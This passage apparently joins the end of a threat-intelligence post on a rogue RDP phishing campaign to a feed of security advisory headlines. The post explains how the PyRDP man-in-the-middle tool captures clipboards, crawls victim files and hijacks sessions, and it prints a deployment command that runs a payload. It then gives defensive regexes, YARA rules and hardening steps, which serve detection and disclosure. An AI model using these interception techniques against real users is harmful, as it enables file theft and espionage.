presented with the RemoteApp instead. In the campaign, given that the username RDP property was empty, the RDP server was attacker-controlled, and the RemoteApp seemed to be core to the storyline of the operation, we suspect a tool like PyRDP was used to bypass the user authentication prompt to directly present the AWS Secure Storage Connection Stability Test v24091285697854 RemoteApp to the victim. Finally, PyRDP automatically captures the RDP challenge during connection establishment. This enables RDP packets to be decrypted if raw network captures are available, revealing more granular details about the RDP session. Command Execution PyRDP allows for commands to be executed on the RDP server. However, it does not allow for command execution on the victim’s machine. At the time of deployment, commands to be executed can be supplied to PyRDP in the following ways: MS-DOS (cmd.exe) PowerShell commands PowerShell scripts hosted on the PyRDP server file system PyRDP executes the command by freezing/blocking the RDP session for a given amount of time, while the command executes in the background. To the user, it seems like the session froze. At the time of deploying the PyRDP MiTM server, the attacker specifies: What command to execute (in one of the aforementioned three ways) How long to block/freeze the user session for How long the command will take to complete PyRDP is capable of detecting user connections and disconnections to RDP sessions. However, it lacks the ability to detect user authentication to the RDP server. As a user may connect to an RDP session without immediately proceeding to account login, PyRDP cannot determine authentication status, thus requiring the attacker to estimate a waiting period following user connection (and preceding authentication) before executing commands. It also requires the attacker to define the duration for which the session is to be frozen during command execution, since PyRDP has no way of knowing when the command completes.  The example in Figure 14 relays incoming connections to an RDP server on 192.168.1.2. Upon connection, it then starts the calc.exe process on the RDP server 20 seconds after the user connects and freezes the user session for five seconds while the command executes. sudo docker run -p 3389:3389 gosecure/pyrdp pyrdp-mitm 192.168.1.2 --payload "timeout 5 & start calc.exe" --payload-delay 20000 --payload-duration 5000 Figure 14: PyRDP deployment command A clever attacker can use this capability of PyRDP to plant malicious files on a redirected drive, even though it cannot directly run it on the victim machine. This could facilitate dropping malicious files in locations that allow for further persistent access (e.g., via DLL-sideloading, malware in startup locations). Defenders can hunt for this activity by monitoring file creations originating from mstsc.exe. We'll dive deeper into practical detection strategies later in this post. Clipboard Capture PyRDP automatically captures the clipboard of the victim user for as long as the RDP connection is active. This is one point where the attacker’s control extends beyond the RDP server and onto the victim machine.  Note that if a user connects from a virtual environment (e.g., VMware) and the host machine's clipboard is mapped to the virtual machine, it would also be forwarded to the RDP session. This can allow the attacker to capture clipboard content from the host and guest machine combined.  Scraping/Browsing Client Files With file redirection enabled, PyRDP can crawl the target system and save all or specified folders to the MiTM server if instructed at setup using the --crawl option. If the --crawl option is not specified at setup, PyRDP will still capture files, but only those accessed by the user during the RDP session, such as environment files. During an active connection, an attacker can also connect to the live stream and freely browse the target system's file system via the PyRDP-player GUI to download files (see Figure 15).  It is worth noting that while PyRDP does not explicitly present the ability to place files on the victim’s mapped drives, the RDP protocol itself does allow it. Should an adversary misuse that capability, it would be outside the scope of PyRDP. Stream/Capture/Intercept RDP Sessions PyRDP is capable of recording RDP sessions for later playback. An attacker can optionally stream each intercepted connection and thereafter connect to the stream port to interact with the live RDP connection. The attacker can also take control of the RDP server and perform actions on the target system. When an attacker takes control, the RDP connection hangs for the user, similar to when commands are executed when a user connects.  Streaming, if enabled with the -i option, defaults to TCP port 3000 (configurable). Live connections are streamed on a locally bound port, accessible via the included pyrdp-player script GUI. Upon completion of a connection, an .mp4 recording of the session can be produced by PyRDP. Figure 15: Live session streaming GUI (source: DEF CON Safe Mode Demo Labs - Olivier Bilodeau - PyRDP) Recommendations for Defenders This section focuses on collecting forensic information, hardening systems, and developing detections for RDP techniques used in the campaign. Security detections detailed in this section are already integrated into the Google SecOps Enterprise+ platform. In addition, Google maintains similar proactive measures to protect Gmail and Google Workspace users. Log Artifacts Default Windows Machine During testing, limited evidence was recovered on default Windows systems after drive redirection and RemoteApp interaction. In practice, it would be difficult to distinguish between a traditional RDP connection and one with drive redirection and/or RemoteApp usage on a default Windows system. From a forensic perspective, the following patterns are of moderate interest:  Creation of the following registry key upon connection, which gives insight into attacker server address and username used: HKU\S-1-5-21-4272539574-4060845865-869095189-1000\SOFTWARE\ Microsoft\Terminal Server Client\Servers\ HKU\S-1-5-21-4272539574-4060845865-869095189-1000\SOFTWARE\ Microsoft\Terminal Server Client\Servers\\UsernameHint: "" The information contained in the Windows Event Logs (Microsoft-Windows-TerminalServices-RDPClient/Operational):  Event ID 1102: Logs attacker server IP address Event ID 1027: Logs attacker server domain name Event ID 1029: Logs username used to authenticate in format base64(sha256(username)). Heightened Logging Windows Machine With enhanced logging capabilities (e.g., Sysmon, Windows advanced audit logging, EDR), artifacts indicative of file write activity on the target system may be present. This was tested and validated using Sysmon file creation events (event ID 11).  Victim system drives can be mapped to the RDP server via RDP resource redirection, enabling both read and write operations. Tools such as PyRDP allow for crawling and downloading the entire file directory of the target system.  When files are written to the target system using RDP resource redirection, the originating process is observed to be C:\Windows\system32\mstsc.exe. A retrospective analysis of a large set of representative data consisting of enhanced logs indicates that file write events originating from mstsc.exe are a common occurrence but display a pattern that could be excluded from alerting.  For example, multiple arbitrarily named terminal server-themed .tmp files following the regex pattern _TS[A-Z0-9]{4}\.tmp (e.g., _TS4F12.tmp) are written to the user’s %APPDATA%/Local/Temp directory throughout the duration of the connection. EventType: FileCreation Parent Process: C:\Windows\System32\mstsc.exe Target Files: --> C:\Users\Spongebob\AppData\Local\Temp\_TS1D72.tmp --> C:\Users\Spongebob\AppData\Local\Temp\_TS7B73.tmp --> C:\Users\Spongebob\AppData\Local\Temp\_TS36B3.tmp Additionally, several file writes and folder creations related to the protocol occur in the %APPDATA%/Local\Microsoft\Terminal Server Client directory.  Depending upon the RDP session, excluding these protocol-specific file writes could help manage the number of events to triage and spot potentially interesting ones. It’s worth noting that the Windows system by default will delete temporary folders from the remote computer upon logoff. This does not apply to the file operations on redirected drives. Should file read activity be enabled, mstsc.exe-originating file reads could warrant suspicion. It is worth noting that file-read events by nature are noisy due to the way the Windows subsystem operates. Caution should be taken before enabling it. .rdp File via Email The .rdp configuration file within the campaign was observed being sent as an email attachment. While it's not uncommon for IT administrators to send .rdp files over email, the presence of an external address in the attachment may be an indicator of compromise. The following regex patterns, when run against an organization’s file creation events, can indicate .rdp files being run directly from Outlook email attachments: /\\AppData\\Local\\Microsoft\\Windows\\(INetCache|Temporary Internet Files) \\Content\.Outlook\\[A-Z0-9]{8}\\[^\\]{1,255}\.rdp$/ /\\AppData\\Local\\Packages\\Microsoft\.Outlook_[a-zA-Z0-9]{1,50}\\.{0,120} \\[^\\]{1,80}\.rdp$/ /\\AppData\\Local\\Microsoft\\Olk\\Attachments\\([^\\]{1,50}\\){0,5}[^\\] {1,80}\.rdp$/ System Hardening The following options could assist with hardening enterprise environments against RDP attack techniques. Network-level blocking of outgoing RDP traffic to public IP addresses Disable resource redirection via the Registry Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Terminal Server Client Type: REG_DWORD Value name: DisableDriveRedirection Value data: 1 Configure granular RDP-policies via Group Policy Computer Configuration -> Administrative Templates -> Windows Components -> Remote Desktop Services -> Remote Desktop Connection Client Allow .rdp files from unknown publishers: Setting this to disable will not allow users to run unsigned .rdp files as well as ones from untrusted publishers. Specify SHA1 Thumbprints of certificates representing trusted .rdp publishers: A way to add certificate SHA1s as trusted file publishers Computer Configuration -> Administrative Templates -> Windows Components -> Remote Desktop Services -> Remote Desktop Session Host: Policies on enable/disabling Resource redirection Clipboard redirection Forcing Network Level Authentication Time limits for active/idle connections Blocking .rdp file extension as email attachments The applicability of these measures is subject to the nature of activity within a given environment and what is considered “normal” behavior. YARA Rules These YARA rules can be used to detect suspicious RDP configuration files that enable resource redirection and RemoteApps. /* Detect RDP config files utilizing RemoteApp and ResourceRedirection */ rule G_Hunting_RDP_File_RemoteApp_ResourceRedir_1 { meta: author = "Google Threat Intelligence Group" description = "Detect RDP config files utilizing RemoteApp and resource redirection" strings: $rdp_param1 = "remoteapplicationmode:i:1" wide $rdp_param2 = "drivestoredirect:s:" wide $rdp_param3 = "remoteapplicationprogram:s:" wide $rdp_param4 = "remoteapplicationname:s:" wide condition: filesize < 20KB and (2 of ($rdp_param*)) } /* Detect RDP config files with a base64 LetsEncrypt certificate */ rule G_Hunting_RDP_File_LetsEncrypt_Signed_1 { meta: author = "Google Threat Intelligence Group" description = "Detects signed RDP configuration files that contain a base64 encoded LetsEncrypt certificate" strings: $rdp_param1 = "full address" wide $rdp_param2 = "redirectclipboard" wide $rdp_param3 = "remoteapplicationmode" wide $rdp_param4 = "compression" wide $rdp_param5 = "remoteapplicationexpandcmdline" wide $rdp_param6 = "promptcredentialonce" wide $rdp_param7 = "allow font smoothing" wide $rdp_param8 = "desktopheight" wide $rdp_param9 = "screen mode id" wide $rdp_param10 = "videoplaybackmode" wide $lets_encrypt_1 = "Let's Encrypt" base64wide $lets_encrypt_2 = "lencr.org" base64wide condition: filesize < 20KB and (any of ($lets_encrypt_*)) and (2 of ($rdp_param*)) } Final Thoughts This campaign demonstrates how common tradecraft can be revitalized with alarming effectiveness through a modular approach. By combining mass emailing, resource redirection, and the creative sleight-of-hand use of RemoteApps, the actor could effectively leverage existing RDP techniques while leaving minimal forensic evidence. This combination of familiar techniques, deployed in an unconventional manner, proved remarkably effective, proving that the true danger of Rogue RDP lies not in the code, but in the con. In this particular campaign, while control over the target system seems limited, the main capabilities revolve around file stealing, clipboard data capture, and access to environment variables. It is more likely this campaign was aimed at espionage and user manipulation during interaction. Lastly, this campaign once again underscores how readily available red teaming tools intended for education purposes are weaponized by malicious actors with harmful intentions. Acknowledgments Special thanks to: Van Ta, Steve Miller, Barry Vengerik, Lisa Karlsen, Andrew Thompson, Gabby Roncone, Geoff Ackerman, Nick Simonian, and Mike Stokkel.  References  CERT-UA Campaign Post MS-RDPBCGR (Remote Desktop Protocol: Basic Connectivity and Graphics Remoting) MS-RDPERP (Remote Desktop Protocol: Remote Programs Virtual Channel Extension) MS-RDPECLIP (Remote Desktop Protocol: Clipboard Virtual Channel Extension) MS-RDPEFS (Remote Desktop Protocol: File System Virtual Channel Extension) RDP Properties (Microsoft) RDP Properties (donkz.nl) Rogue RDP – Revisiting Initial Access Methods (Black Hills Information Security) PyRDP GitHub

https://cloud.google.com/blog/topics/threat-intelligence/windows-rogue-remote-desktop-protocol/
Speed with Precision: Early and Accurate Response to Apache Camel CVEs
2025-04-07T09:00:00Z | 1744016400

https://www.akamai.com/blog/security/2025/apr/early-and-accurate-response-to-apache-camel-cves
ZDI-CAN-26813: Dassault Systèmes
2025-04-07T05:00:00Z | 1744002000

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-04-07, 60 days ago. The vendor is given until 2025-08-05 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26823: PDF-XChange
2025-04-07T05:00:00Z | 1744002000

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Suyue Guo from UCSB Seclab' was reported to the affected vendor on: 2025-04-07, 60 days ago. The vendor is given until 2025-08-05 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-25-200: Exim Use-After-Free Local Privilege Escalation Vulnerability
2025-04-07T05:00:00Z | 1744002000

This vulnerability allows local attackers to escalate privileges on affected installations of Exim. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-30232.

http://www.zerodayinitiative.com/advisories/ZDI-25-200/
ZDI-25-201: Trend Micro Cleaner One Pro Link Following Denial-of-Service Vulnerability
2025-04-07T05:00:00Z | 1744002000

This vulnerability allows local attackers to create a denial-of-service condition on affected installations of Trend Micro Cleaner One Pro. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. Additionally, the vulnerability is triggered only when an administrator performs an install of the product. The ZDI has assigned a CVSS rating of 4.4. The following CVEs are assigned: CVE-2025-27529.

http://www.zerodayinitiative.com/advisories/ZDI-25-201/
ZDI-25-202: Fortinet FortiWeb cgi_xmlprotection_xmlschemafile_post Directory Traversal Arbitrary File Write Vulnerability
2025-04-07T05:00:00Z | 1744002000

This vulnerability allows remote attackers to create arbitrary XML schema files on affected installations of Fortinet FortiWeb. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 5.5. The following CVEs are assigned: CVE-2024-55597.

http://www.zerodayinitiative.com/advisories/ZDI-25-202/
ZDI-25-203: GIMP XWD File Parsing Integer Overflow Remote Code Execution Vulnerability
2025-04-07T05:00:00Z | 1744002000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-2760.

http://www.zerodayinitiative.com/advisories/ZDI-25-203/
ZDI-25-204: GIMP FLI File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability
2025-04-07T05:00:00Z | 1744002000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-2761.

http://www.zerodayinitiative.com/advisories/ZDI-25-204/
ZDI-25-205: Amazon AWS CloudFormation Templates Uncontrolled Search Path Element Remote Code Execution Vulnerability
2025-04-07T05:00:00Z | 1744002000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Amazon AWS. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 9.8.

http://www.zerodayinitiative.com/advisories/ZDI-25-205/
ZDI-25-206: Amazon AWS CloudFormation Templates Uncontrolled Search Path Element Remote Code Execution Vulnerability
2025-04-07T05:00:00Z | 1744002000

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Amazon AWS. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 9.8.

http://www.zerodayinitiative.com/advisories/ZDI-25-206/
High Threat Security Alert (A25-04-05): Vulnerability in Ivanti Products
2025-04-07T04:00:00Z | 1743998400

Ivanti has released security advisories to address the vulnerability in Ivanti products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-04-06): Multiple Vulnerabilities in Microsoft Edge
2025-04-07T04:00:00Z | 1743998400

Microsoft released a security update to address vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
GreyNoise Observes 3X Surge in Exploitation Attempts Against TVT DVRs — Likely Mirai
2025-04-07T00:00:00Z | 1743984000

GreyNoise has observed a significant spike in exploitation attempts against TVT NVMS9000 DVRs. This information disclosure vulnerability can be used to gain administrative control over affected systems.

https://www.greynoise.io/blog/surge-exploitation-attempts-tvt-dvrs
Цільова шпигунська активність UAC-0226 у відношенні осередків інновацій, державних і правоохоронних органів з використанням стілеру GIFTEDCROOK (CERT-UA#14303)
2025-04-06T17:32:56Z | 1743960776

Урядовою командою реагування на комп'ютерні надзвичайні події України CERT-UA, починаючи з лютого 2025 року, відстежується цільова активність, яка здійснюється з метою шпигунства у відношенні осередків розвитку інновацій у військовій сфері, військових формувань, правоохоронних органів України та органів місцевого самоврядування, особливо тих, що розташовані вздовж східного кордону країни.

https://cert.gov.ua/article/6282946
Beyond Prevention: How Sandbox Enables Deep Forensic Analysis to Strengthen Security
2025-04-06T06:56:10Z | 1743922570

For years, cybersecurity has focused on prevention: blocking threats before they execute. Next-generation anti-malware (NGAM) and signature-based Anti-Malware engines (AM) stop known threats and zero-day attacks. However, as threats grow more sophisticated, organizations also require deep forensic insights to fully understand attack patterns and identify proactive prevention strategies beyond blocking malware, enabling them to strengthen... The post Beyond Prevention: How Sandbox Enables Deep Forensic Analysis to Strengthen Security  appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-sandbox-enables-deep-forensic-analysis-to-strengthen-security/
0 to SASE in 60 Minutes
2025-04-06T06:19:00Z | 1743920340

The post 0 to SASE in 60 Minutes appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-0-to-sase-in-60-minutes-25
Is The Sofistication In The Room With Us? - X-Forwarded-For and Ivanti Connect Secure (CVE-2025-22457)
2025-04-04T13:45:53Z | 1743774353

What's that Skippy? Another Ivanti Connect Secure vulnerability?At this point, regular readers will know all about Ivanti (and a handful of other vendors of the same class of devices), from our regular analysis. Do you know the fun things about these posts? We can copy text from

https://labs.watchtowr.com/is-the-sofistication-in-the-room-with-us-x-forwarded-for-and-ivanti-connect-secure-cve-2025-22457/
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) - 14/2025
2025-04-04T13:08:30Z | 1743772110

This week, we report on malware that steals information and is being distributed under the guise of copyright infringement. Other topics include the risks associated with edge devices and the tools provided by the EU Digital Services Act to combat election interference.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-142025
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) - 14/2025
2025-04-04T13:08:30Z | 1743772110

This week, we report on malware that steals information and is being distributed under the guise of copyright infringement. Other topics include the risks associated with edge devices and the tools provided by the EU Digital Services Act to combat election interference.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-142025
Why Digital Resilience Starts Before a Slowdown
2025-04-04T13:00:00Z | 1743771600

Digital resilience is not a response plan. It’s a readiness posture. Too often, business continuity strategies are activated only after disruptions occur. But by then, the damage has already begun. Systems are degrading. Customers are impacted. Stakeholders are asking questions. The real work of resilience happens...

https://www.netscout.com/blog/why-digital-resilience-starts-slowdown
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) - 13/2025
2025-04-04T12:15:46Z | 1743768946

This week, we cover topics including how to communicate about a cyberattack and the upcoming Cybersecurity Act, which may require action from those subject to the NIS 2 obligations.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-132025
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) - 13/2025
2025-04-04T12:15:46Z | 1743768946

This week, we cover topics including how to communicate about a cyberattack and the upcoming Cybersecurity Act, which may require action from those subject to the NIS 2 obligations.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-132025
ZDI-CAN-26791: Microsoft
2025-04-04T05:00:00Z | 1743742800

A CVSS score 7.8 AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H severity vulnerability discovered by 'Marcin Wiazowski' was reported to the affected vendor on: 2025-04-04, 63 days ago. The vendor is given until 2025-08-02 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26847: Apple
2025-04-04T05:00:00Z | 1743742800

A CVSS score 3.3 AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N severity vulnerability discovered by 'Michael DePlante (@izobashi) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-04-04, 63 days ago. The vendor is given until 2025-08-02 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26846: Apple
2025-04-04T05:00:00Z | 1743742800

A CVSS score 3.3 AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N severity vulnerability discovered by 'Michael DePlante (@izobashi) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-04-04, 63 days ago. The vendor is given until 2025-08-02 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26750: Microsoft
2025-04-04T05:00:00Z | 1743742800

A CVSS score 3.3 AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N severity vulnerability discovered by 'St4nly0n' was reported to the affected vendor on: 2025-04-04, 63 days ago. The vendor is given until 2025-08-02 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26830: Apple
2025-04-04T05:00:00Z | 1743742800

A CVSS score 3.3 AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N severity vulnerability discovered by 'Michael DePlante (@izobashi) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-04-04, 63 days ago. The vendor is given until 2025-08-02 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26636: Apple
2025-04-04T05:00:00Z | 1743742800

A CVSS score 6.5 AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-04-04, 63 days ago. The vendor is given until 2025-08-02 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
DeepSeek é mais seguro contra hackers?
2025-04-04T00:28:08Z | 1743726488

https://nsfocusglobal.com/web-stories/deepseek-e-mais-seguro-contra-hackers/
The Fast Flux DNS Threat: A Call to Action Against a Geopolitical and Hacktivist Nightmare
2025-04-03T21:12:54Z | 1743714774

Artificial Intelligence (AI) has quickly become an integral part of modern workflows, with AI-powered applications like copilots, chatbots, and large-scale language models streamlining automation, decision-making, and data processing. However, these same tools introduce significant security risks—often in ways organizations fail to anticipate.

https://mixmode.ai/blog/the-fast-flux-dns-threat-a-call-to-action-against-a-geopolitical-and-hacktivist-nightmare/
Joint guidance on fast flux
2025-04-03T19:56:39Z | 1743710199

Fast flux is a technique used by threat actors to obfuscate the locations of malicious servers. Threat actors do this by rapidly changing domain name system (DNS) records associated with a domain name. The use of fast flux poses a significant threat to national security. The fast flux technique allows threat actors to create resilient and highly available command and control infrastructure and conceal their malicious activities.

https://cyber.gc.ca/en/news-events/joint-guidance-fast-flux
Chromium: CVE-2025-3074 Inappropriate implementation in Downloads
2025-04-03T17:47:35Z | 1743702455

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/2024 ) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-3074
Chromium: CVE-2025-3073 Inappropriate implementation in Autofill
2025-04-03T17:47:33Z | 1743702453

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/2024 ) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-3073
Chromium: CVE-2025-3072 Inappropriate implementation in Custom Tabs
2025-04-03T17:47:31Z | 1743702451

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/2024 ) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-3072
Chromium: CVE-2025-3071 Inappropriate implementation in Navigations
2025-04-03T17:47:28Z | 1743702448

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/2024 ) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-3071
Chromium: CVE-2025-3070 Insufficient validation of untrusted input in Extensions
2025-04-03T17:47:26Z | 1743702446

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/2024 ) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-3070
Chromium: CVE-2025-3069 Inappropriate implementation in Extensions
2025-04-03T17:47:24Z | 1743702444

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/2024 ) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-3069
Chromium: CVE-2025-3068 Inappropriate implementation in Intents
2025-04-03T17:47:22Z | 1743702442

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/2024 ) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-3068
Chromium: CVE-2025-3067 Inappropriate implementation in Custom Tabs
2025-04-03T17:47:20Z | 1743702440

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/2024 ) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-3067
Chromium: CVE-2025-3066 Use after free in Navigations
2025-04-03T17:47:15Z | 1743702435

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/2024 ) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-3066
Top 7 Cybersecurity and Resilience Takeaways from DISTRIBUTECH 2025 for Critical Infrastructure Leaders
2025-04-03T17:12:57Z | 1743700377

The Shift Toward Operational Resilience in Critical Infrastructure Whether you’re responsible for maintaining uptime in the field or ensuring secure data flow across your network architecture, this year’s discussions pointed to a shared priority: resilience. As the demands on infrastructure grow and threats evolve, OT and IT leaders are being called to work more closely... View Article The post Top 7 Cybersecurity and Resilience Takeaways from DISTRIBUTECH 2025 for Critical Infrastructure Leaders appeared first on Owl Cyber Defense.

https://owlcyberdefense.com/blog/operational-resilience-cybersecurity-takeaways/
2025-016: Critical Vulnerability in Ivanti Products
2025-04-03T16:57:40Z | 1743699460

On April 4, 2025, Ivanti released a security advisory regarding a critical vulnerability affecting their products. The vulnerability is known to be exploited in the wild. The vulnerability has been fixed in the February 2025 release and was initially identified as a product bug. CERT-EU recommends upgrading to a supported and fixed version of Ivanti products as soon as possible. CERT-EU also recommends reviewing forensic evidence to detect any signs of exploitation.

https://cert.europa.eu/publications/security-advisories/2025-016/
2025-015: Critical vulnerability in CrushFTP
2025-04-03T16:55:47Z | 1743699347

In April 2025, information about an easy-to-exploit critical vulnerability affecting CrushFTP was made public. It is recommended updating affected server as soon as possible. Proof of concepts are available, and the vulnerability is being exploited in the wild.

https://cert.europa.eu/publications/security-advisories/2025-015/
2025-014: Critical Vulnerability in Apache Tomcat
2025-04-03T16:55:02Z | 1743699302

On March 10, 2025, Apache released a security advisory regarding a critical vulnerability affecting the Apache Tomcat product. It is recommended updating the affected assets to a fixed version of Apache Tomcat.

https://cert.europa.eu/publications/security-advisories/2025-014/
Localhost dangers: CORS and DNS rebinding
2025-04-03T16:00:24Z | 1743696024

What is CORS and how can a CORS misconfiguration lead to security issues? In this blog post, we’ll describe some common CORS issues as well as how you can find and fix them. The post Localhost dangers: CORS and DNS rebinding appeared first on The GitHub Blog.

https://github.blog/security/application-security/localhost-dangers-cors-and-dns-rebinding/
Security Update: Pulse Connect Secure, Ivanti Connect Secure, Policy Secure and Neurons for ZTA Gateways
2025-04-03T14:13:23Z | 1743689603

** The following has been updated to make clear the vulnerability was fully patched in Ivanti Connect Secure 22.7R2.6 (released February 11, 2025).  At Ivanti, our mission is to empower customers to defend their environments in an evolving and increasingly sophisticated threat landscape. This includes providing industry-leading products, transparent communication, and sophisticated tools to help to protect and fortify networks. Central to this mission is a culture of transparency and responsiveness, especially when facing a security issue. This is essential for the health and security of the entire industry and the organizations we serve. To this end, we are issuing an important security update addressing a vulnerability in Pulse Connect Secure (version 9.1x, which reached end-of-support December 31, 2024), Ivanti Connect Secure (version 22.7R2.5 and earlier), Policy Secure and Neurons for ZTA gateways. We are reporting the vulnerability as CVE-2025-22457. Customers have a significantly reduced risk from this vulnerability if they are running appliances on supported versions and in accordance with Ivanti's guidance: This vulnerability was fully patched in Ivanti Connect Secure 22.7R2.6 (released February 11, 2025). Ivanti Policy Secure should not be an internet facing solution. Users that follow Ivanti’s guidance regarding internet exposure are at a reduced risk from this vulnerability. Neurons for ZTA gateways cannot be exploited when in production. We are aware of a limited number of customers whose appliances have been exploited and are running Ivanti Connect Secure 22.7R2.5 or earlier or Pulse Connect Secure 9.1x. At the time of this disclosure, we are not aware of any exploitation of this vulnerability in Ivanti Policy Secure or Neurons for ZTA gateways, which have meaningfully reduced risk from this vulnerability. Pulse Connect Secure 9.1x reached End-of-Support on December 31, 2024, and no longer receives code support or changes. Customers who have not yet migrated from this solution will need to contact Ivanti for a migration path to Ivanti Connect Secure or migrate to another secure solution to ensure their security. Ivanti always encourages customers to remain on the latest version of software so they can benefit from important security and product enhancements. We have made additional resources and support teams available to assist customers in implementing the patch and addressing any concerns. More information is available in this Security Advisory on the vulnerability and the nature of the threat so that customers can protect their environment. Thank you to our customers and security partners for their engagement and support, which enabled our swift detection and response to this issue. We remain committed to continuously improving our products and processes through collaboration and transparency with our stakeholders and the broader security ecosystem. Our Support team is always available to help customers and partners should they have any questions. Cases can be logged via the Success portal (login credentials required). Want to stay up to date on Ivanti Security Advisories? Paste https://www.ivanti.com/blog/topics/security-advisory/rss into your preferred RSS reader / functionality in your email program.

https://www.ivanti.com/blog/security-update-pulse-connect-secure-ivanti-connect-secure-policy-secure-and-neurons-for-zta-gateways
Suspected China-Nexus Threat Actor Actively Exploiting Critical Ivanti Connect Secure Vulnerability (CVE-2025-22457)
2025-04-03T14:00:00Z | 1743688800

